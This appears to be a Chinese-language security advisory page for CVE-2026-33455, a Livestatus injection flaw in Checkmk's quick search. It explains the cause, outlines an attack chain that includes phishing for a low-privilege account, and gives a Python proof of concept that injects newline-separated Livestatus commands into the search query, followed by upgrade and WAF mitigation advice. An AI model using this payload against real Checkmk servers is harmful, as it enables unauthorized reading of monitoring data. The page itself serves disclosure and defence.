CVE-2026-33455 CVSS 6.3 中危

CVE-2026-33455 Checkmk Livestatus注入漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33455

漏洞类型

Livestatus注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Checkmk

漏洞概述

Checkmk是一款广泛使用的IT基础设施监控工具。在2.5.0b4之前的版本中，其监控快速搜索功能被发现存在Livestatus注入漏洞。该漏洞的根源在于搜索过滤器插件未能对用户输入进行严格的清理和验证。因此，拥有低权限账户的攻击者可以通过构造恶意的搜索查询，向系统后端注入Livestatus命令。成功利用此漏洞可能允许攻击者在未授权的情况下读取敏感数据、篡改系统配置或导致部分服务不可用。鉴于该漏洞需要认证且影响范围有限，其CVSS v3.1评分为6.3（中危）。

技术细节

该漏洞的核心机制在于对Livestatus协议查询语句的构造不当。Livestatus是Checkmk组件用于实时访问监控核心数据的一种接口协议，它通常通过文本格式进行交互。在Checkmk的监控快速搜索功能中，后端代码接收用户输入的搜索字符串，并尝试将其转换为Livestatus查询语句的一部分。然而，由于缺乏对输入中换行符（\n）及特定协议关键字（如Filter、Columns、Stats等）的过滤，攻击者可以操纵查询结构。具体而言，攻击者可以在搜索框中输入看似正常的文本，紧接着插入换行符和恶意的Livestatus命令。例如，通过注入`Filter: host_name = ...`，攻击者可以修改查询条件，从而绕过前端界面的限制，直接查询后端数据库中的敏感信息。由于该漏洞需要经过身份验证（PR:L），攻击者首先需要获取一个合法的低权限账户，然后利用该注入点提升数据访问权限或执行未授权的配置读取。

攻击链分析

STEP 1

信息收集

攻击者识别目标的Checkmk版本，确认其低于2.5.0b4。

STEP 2

获取凭证

攻击者通过钓鱼或其他方式获取一个低权限的Checkmk账户凭证。

STEP 3

漏洞利用

攻击者使用获取的凭证登录系统，并在监控快速搜索框中注入包含Livestatus命令的恶意Payload。

STEP 4

执行命令

后端未经过滤直接处理输入，导致恶意Livestatus命令被执行，可能泄露敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://target-checkmk-server/checkmk/api/1.0/domain-types/quicksearch/collections/all"
username = "low_priv_user"
password = "password"

# Livestatus injection payload
# The payload attempts to inject a new line and a command to list columns
# exploiting the insufficient input sanitization in the quicksearch.
payload = "test\nColumns: host_name description\n"

params = {
    "q": payload  # Injecting payload into the search query
}

try:
    # Sending the request with authentication
    response = requests.get(target_url, params=params, auth=(username, password), verify=False)
    
    if response.status_code == 200:
        print("[+] Potential exploitation successful!")
        print("[+] Response content:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Checkmk < 2.5.0b4

防御指南

临时缓解措施

建议立即将Checkmk系统升级至2.5.0b4或更高版本以彻底修复此漏洞。如果暂时无法升级，应限制非管理员用户使用监控快速搜索功能，或通过Web应用防火墙（WAF）拦截包含特殊字符序列（如连续的换行符或特定协议头）的HTTP请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-33455
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-33455
3 Details https://www.cvedetails.com/cve/CVE-2026-33455/
4 VulDB https://vuldb.com/cve/CVE-2026-33455
5 Link https://checkmk.com/werk/17988

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表